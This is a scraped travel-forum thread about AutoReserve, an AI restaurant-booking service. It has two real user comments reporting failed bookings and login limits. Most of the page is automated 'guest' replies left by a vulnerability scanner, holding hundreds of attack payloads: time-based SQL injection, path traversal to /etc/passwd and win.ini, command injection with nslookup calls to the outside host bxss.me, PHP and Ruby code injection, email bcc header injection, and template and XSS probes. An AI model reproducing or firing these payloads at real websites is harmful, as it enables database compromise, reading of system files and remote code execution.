Tokyo Table Trip

Logo discover 8a060a5a25d78a2d81322b0a16884eb1c05869ebadb772a16350e198984e5cfb

BACK

AutoReserve

thetokyogourmet

Has anyone used AutoReserve?

Add photos

8 Comments


I tried to use it to book tenhaku but it didn't work. But it is an interesting concept of using ai to make reservations. And the reservation price is quite cheap

1680162259 Reply
Add photos

re: guest

DX84Bh1d

1696996696

re: guest

1*

1696996696

re: guest

1*

1696996696

re: guest

1*

1696996696

re: guest

1*

1696996696

re: guest

-1 OR 2+46-46-1=0+0+0+1

1696996697

re: guest

-1 OR 3+46-46-1=0+0+0+1

1696996697

re: guest

if(now()=sysdate(),sleep(15),0)

1696996704

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1696996713

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1696996723

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1696996729

re: guest

-1; waitfor delay '0:0:15' --

1696996737

re: guest

-1); waitfor delay '0:0:15' --

1696996746

re: guest

1 waitfor delay '0:0:15' --

1696996753

re: guest

te5fClNN'; waitfor delay '0:0:15' --

1696996762

re: guest

-5 OR 961=(SELECT 961 FROM PG_SLEEP(15))--

1696996770

re: guest

-5) OR 902=(SELECT 902 FROM PG_SLEEP(15))--

1696996778

re: guest

-1)) OR 121=(SELECT 121 FROM PG_SLEEP(15))--

1696996787

re: guest

eJrFMpVi' OR 625=(SELECT 625 FROM PG_SLEEP(15))--

1696996801

re: guest

kDJWta2d') OR 591=(SELECT 591 FROM PG_SLEEP(15))--

1696996812

re: guest

joFJzdK1')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--

1696996822

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1696996834

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1696996842

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1696996853

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1696996862

re: guest

1'"

1696996862

re: guest

@@iKFXC

1696996863

re: guest

MCx7nZOK

1697002508

re: guest

1*

1697002508

re: guest

1*

1697002509

re: guest

1*

1697002509

re: guest

1*

1697002509

re: guest

-1 OR 2+362-362-1=0+0+0+1

1697002509

re: guest

-1 OR 3+362-362-1=0+0+0+1

1697002510

re: guest

if(now()=sysdate(),sleep(15),0)

1697002514

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002518

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002523

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002528

re: guest

-1; waitfor delay '0:0:15' --

1697002533

re: guest

-1); waitfor delay '0:0:15' --

1697002537

re: guest

1 waitfor delay '0:0:15' --

1697002541

re: guest

6GV3HVSP'; waitfor delay '0:0:15' --

1697002546

re: guest

-5 OR 314=(SELECT 314 FROM PG_SLEEP(15))--

1697002551

re: guest

-5) OR 621=(SELECT 621 FROM PG_SLEEP(15))--

1697002556

re: guest

-1)) OR 472=(SELECT 472 FROM PG_SLEEP(15))--

1697002561

re: guest

RLm86hqb' OR 606=(SELECT 606 FROM PG_SLEEP(15))--

1697002565

re: guest

XuYYZPBs') OR 972=(SELECT 972 FROM PG_SLEEP(15))--

1697002571

re: guest

p73KzAKf')) OR 83=(SELECT 83 FROM PG_SLEEP(15))--

1697002575

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002579

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002583

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002587

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002592

re: guest

1'"

1697002593

re: guest

@@HFO3k

1697002593

re: guest

1ZzpmqoVO

1727140931

re: guest

response.write(9708793*9061780)

1727140992

re: guest

%0abcc:074625.67-13697.67.2aebf.19990.2@bxss.me

1727140992

re: guest

'+response.write(9708793*9061780)+'

1727140992

re: guest

to@example.com>%0d%0abcc:074625.67-13698.67.2aebf.19990.2@bxss.me

1727140993

re: guest

"+response.write(9708793*9061780)+"

1727140993

re: guest

../../../../../../../../../../../../../../etc/passwd

1727140994

re: guest

<esi:include src="http://bxss.me/rpb.png"/>

1727140994

re: guest

../../../../../../../../../../../../../../windows/win.ini

1727140995

re: guest

file:///etc/passwd

1727140995

re: guest

../../../../../../../../../../../../../../../proc/version

1727140996

re: guest

${9999063+10000268}

1727140996

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140997

re: guest

../../../../../../../../../../etc/passwd%00.jpg

1727140997

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140998

re: guest

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140998

re: guest

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140999

re: guest

/etc/passwd

1727140999

re: guest

%2fetc%2fpasswd

1727141000

re: guest

echo rccnms$()\ uwogns\nz^xyu||a #' &echo rccnms$()\ uwogns\nz^xyu||a #|" &echo rccnms$()\ uwogns\nz^xyu||a #

1727141000

re: guest

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141000

re: guest

&echo intfrq$()\ rizrcb\nz^xyu||a #' &echo intfrq$()\ rizrcb\nz^xyu||a #|" &echo intfrq$()\ rizrcb\nz^xyu||a #

1727141001

re: guest

)

1727141001

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141001

re: guest

|echo czitmb$()\ nadxmr\nz^xyu||a #' |echo czitmb$()\ nadxmr\nz^xyu||a #|" |echo czitmb$()\ nadxmr\nz^xyu||a #

1727141001

re: guest

!(()&&!|*|*|

1727141001

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141002

re: guest

(nslookup hitgkbgqqpsrl75ca0.bxss.me||perl -e "gethostbyname('hitgkbgqqpsrl75ca0.bxss.me')")

1727141002

re: guest

^(#$!@#$)(()))******

1727141002

re: guest

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141002

re: guest

$(nslookup hithieweqcmfa36572.bxss.me||perl -e "gethostbyname('hithieweqcmfa36572.bxss.me')")

1727141002

re: guest

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141003

re: guest

&nslookup hitlxnuoeutqh0f9dd.bxss.me&'\"`0&nslookup hitlxnuoeutqh0f9dd.bxss.me&`'

1727141003

re: guest

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141003

re: guest

&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&'\"`0&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&`'

1727141003

re: guest

file:///etc/passwd

1727141004

re: guest

|(nslookup hithhwerdysvdb7c23.bxss.me||perl -e "gethostbyname('hithhwerdysvdb7c23.bxss.me')")

1727141004

re: guest

/\../\../\../\../\../\../\../etc/passwd

1727141005

re: guest

`(nslookup hitvvigqfpdxx4740e.bxss.me||perl -e "gethostbyname('hitvvigqfpdxx4740e.bxss.me')")`

1727141005

re: guest

'.gethostbyname(lc('hitek'.'zihygqpya2f48.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(73).chr(108).chr(87).'

1727141005

re: guest

/WEB-INF/web.xml

1727141005

re: guest

;(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")|(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")&(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")

1727141005

re: guest

".gethostbyname(lc("hitiz"."mmjqlwdtcd938.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(71).chr(101).chr(74)."

1727141005

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141005

re: guest

C:\WINDOWS\system32\drivers\etc\hosts

1727141006

1727141006

re: guest

../../../../../../../../../../windows/win.ini%00.jpg

1727141006

1727141006

re: guest

/../../../../../../../../../../boot.ini

1727141007

re: guest

/etc/shells

1727141007

re: guest

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141007

re: guest

c:/windows/win.ini

1727141007

re: guest

..\..\..\..\..\..\..\..\windows\win.ini

1727141008

re: guest

bxss.me

1727141008

re: guest

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141009

re: guest

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141010

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141010

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141011

re: guest

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141011

re: guest

WEB-INF/web.xml

1727141012

re: guest

WEB-INF\web.xml

1727141012

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141013

re: guest

';print(md5(31337));$a='

1727141014

re: guest

";print(md5(31337));$a="

1727141014

re: guest

${@print(md5(31337))}

1727141015

re: guest

${@print(md5(31337))}\

1727141016

re: guest

'.print(md5(31337)).'

1727141017

1727141028

re: guest

"+"A".concat(70-3).concat(22*4).concat(97).concat(79).concat(115).concat(72)+(require"socket"
Socket.gethostbyname("hitji"+"eipgjydm2a000.bxss.me.")[3].to_s)+"

1727141029

re: guest

bxss.me/t/xss.html?%00

1727141029

re: guest

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141029

re: guest

'+'A'.concat(70-3).concat(22*4).concat(119).concat(73).concat(98).concat(73)+(require'socket'
Socket.gethostbyname('hitix'+'bntdfifxb3444.bxss.me.')[3].to_s)+'

1727141030

re: guest

'"

1727141031

re: guest

<!--

1727141031

re: guest

1

1727141389

re: guest

1

1727141401

re: guest

-1 OR 2+147-147-1=0+0+0+1 --

1727141402

re: guest

-1 OR 3+147-147-1=0+0+0+1 --

1727141403

re: guest

-1 OR 2+677-677-1=0+0+0+1

1727141403

re: guest

-1 OR 3+677-677-1=0+0+0+1

1727141404

re: guest

-1' OR 2+404-404-1=0+0+0+1 --

1727141405

re: guest

-1' OR 3+404-404-1=0+0+0+1 --

1727141405

re: guest

-1' OR 2+473-473-1=0+0+0+1 or 'a6wdc0Hc'='

1727141406

re: guest

-1' OR 3+473-473-1=0+0+0+1 or 'a6wdc0Hc'='

1727141406

re: guest

-1" OR 2+617-617-1=0+0+0+1 --

1727141407

re: guest

-1" OR 3+617-617-1=0+0+0+1 --

1727141407

re: guest

if(now()=sysdate(),sleep(15),0)

1727141420

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141433

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141463

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141496

re: guest

-1; waitfor delay '0:0:15' --

1727141507

re: guest

-1); waitfor delay '0:0:15' --

1727141515

re: guest

1 waitfor delay '0:0:15' --

1727141523

re: guest

TXpjhF01'; waitfor delay '0:0:15' --

1727141530

re: guest

-5 OR 76=(SELECT 76 FROM PG_SLEEP(15))--

1727141538

re: guest

-5) OR 713=(SELECT 713 FROM PG_SLEEP(15))--

1727141546

re: guest

-1)) OR 321=(SELECT 321 FROM PG_SLEEP(15))--

1727141554

re: guest

hALSadD2' OR 383=(SELECT 383 FROM PG_SLEEP(15))--

1727141563

re: guest

eICRPnH9') OR 728=(SELECT 728 FROM PG_SLEEP(15))--

1727141577

re: guest

Mf0MmkiG')) OR 382=(SELECT 382 FROM PG_SLEEP(15))--

1727141590

re: guest

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141601

re: guest

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141612

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1727141649

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1727141658

re: guest

1'"

1727141659

re: guest

@@fN9Ro

1727141661

re: guest

1

1727383005

re: guest

1

1727383015

re: guest

1

1727383015

re: guest

1

1727383563

re: guest

1

1727383564

re: guest

1

1727383564

Doesn't seem very useful. Tried booking a number of restaurants throughout the day and it refused to let me log in as I have login too many times. And frequency of calls seems to be in the range of every 40 mins once. Might be good for only those less popular restaurants.

1680225083 Reply
Add photos

re: guest

DbQKdeAx

1696996740

re: guest

1*

1696996740

re: guest

1*

1696996741

re: guest

1*

1696996741

re: guest

1*

1696996741

re: guest

-1 OR 2+177-177-1=0+0+0+1

1696996742

re: guest

-1 OR 3+177-177-1=0+0+0+1

1696996742

re: guest

if(now()=sysdate(),sleep(15),0)

1696996749

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1696996756

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1696996766

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1696996774

re: guest

-1; waitfor delay '0:0:15' --

1696996781

re: guest

-1); waitfor delay '0:0:15' --

1696996795

re: guest

1 waitfor delay '0:0:15' --

1696996806

re: guest

X8pzX1pe'; waitfor delay '0:0:15' --

1696996818

re: guest

-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--

1696996830

re: guest

-5) OR 960=(SELECT 960 FROM PG_SLEEP(15))--

1696996838

re: guest

-1)) OR 630=(SELECT 630 FROM PG_SLEEP(15))--

1696996846

re: guest

bo5YKqYZ' OR 374=(SELECT 374 FROM PG_SLEEP(15))--

1696996857

re: guest

Jj7DFq7C') OR 747=(SELECT 747 FROM PG_SLEEP(15))--

1696996866

re: guest

ahB3lTmv')) OR 410=(SELECT 410 FROM PG_SLEEP(15))--

1696996875

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1696996885

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1696996893

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1696996902

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1696996910

re: guest

1'"

1696996910

re: guest

@@NSW3a

1696996911

re: guest

dxF8Jf1j

1697002526

re: guest

1*

1697002527

re: guest

1*

1697002527

re: guest

1*

1697002527

re: guest

1*

1697002528

re: guest

-1 OR 2+796-796-1=0+0+0+1

1697002528

re: guest

-1 OR 3+796-796-1=0+0+0+1

1697002528

re: guest

if(now()=sysdate(),sleep(15),0)

1697002532

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002537

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002541

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002545

re: guest

-1; waitfor delay '0:0:15' --

1697002551

re: guest

-1); waitfor delay '0:0:15' --

1697002556

re: guest

1 waitfor delay '0:0:15' --

1697002560

re: guest

UN2AguTh'; waitfor delay '0:0:15' --

1697002565

re: guest

-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))--

1697002570

re: guest

-5) OR 549=(SELECT 549 FROM PG_SLEEP(15))--

1697002574

re: guest

-1)) OR 216=(SELECT 216 FROM PG_SLEEP(15))--

1697002578

re: guest

gHIGZ9rX' OR 926=(SELECT 926 FROM PG_SLEEP(15))--

1697002583

re: guest

pjYNWCOY') OR 708=(SELECT 708 FROM PG_SLEEP(15))--

1697002587

re: guest

Wq5QGHwc')) OR 378=(SELECT 378 FROM PG_SLEEP(15))--

1697002591

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002596

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002601

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002605

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002610

re: guest

1'"

1697002610

re: guest

@@95F8l

1697002611

re: guest

1gkc4goQO

1727141217

re: guest

response.write(9382382*9986103)

1727141220

re: guest

'+response.write(9382382*9986103)+'

1727141221

re: guest

"+response.write(9382382*9986103)+"

1727141222

re: guest

%0abcc:074625.67-13784.67.3bdc6.19990.2@bxss.me

1727141222

re: guest

to@example.com>%0d%0abcc:074625.67-13785.67.3bdc6.19990.2@bxss.me

1727141222

re: guest

<esi:include src="http://bxss.me/rpb.png"/>

1727141224

re: guest

../../../../../../../../../../../../../../etc/passwd

1727141224

re: guest

${9999960+9999849}

1727141224

re: guest

../../../../../../../../../../../../../../windows/win.ini

1727141225

re: guest

file:///etc/passwd

1727141225

re: guest

../../../../../../../../../../../../../../../proc/version

1727141226

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141227

re: guest

../../../../../../../../../../etc/passwd%00.jpg

1727141228

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141228

re: guest

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141229

re: guest

'.gethostbyname(lc('hitbc'.'atcrftdo8323c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(74).chr(110).chr(72).'

1727141229

re: guest

)

1727141229

re: guest

".gethostbyname(lc("hitls"."uqvcevvc03c1b.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(67).chr(104).chr(82)."

1727141230

re: guest

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141230

re: guest

!(()&&!|*|*|

1727141230

re: guest

/etc/passwd

1727141230

re: guest

echo omlcrd$()\ pvxnfp\nz^xyu||a #' &echo omlcrd$()\ pvxnfp\nz^xyu||a #|" &echo omlcrd$()\ pvxnfp\nz^xyu||a #

1727141231

re: guest

^(#$!@#$)(()))******

1727141231

re: guest

%2fetc%2fpasswd

1727141231

re: guest

&echo dyylsq$()\ tzmaeh\nz^xyu||a #' &echo dyylsq$()\ tzmaeh\nz^xyu||a #|" &echo dyylsq$()\ tzmaeh\nz^xyu||a #

1727141231

re: guest

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141232

re: guest

|echo dfsvca$()\ cbsyte\nz^xyu||a #' |echo dfsvca$()\ cbsyte\nz^xyu||a #|" |echo dfsvca$()\ cbsyte\nz^xyu||a #

1727141232

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141232

re: guest

(nslookup hitqlvsyodpne0fa67.bxss.me||perl -e "gethostbyname('hitqlvsyodpne0fa67.bxss.me')")

1727141233

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141233

re: guest

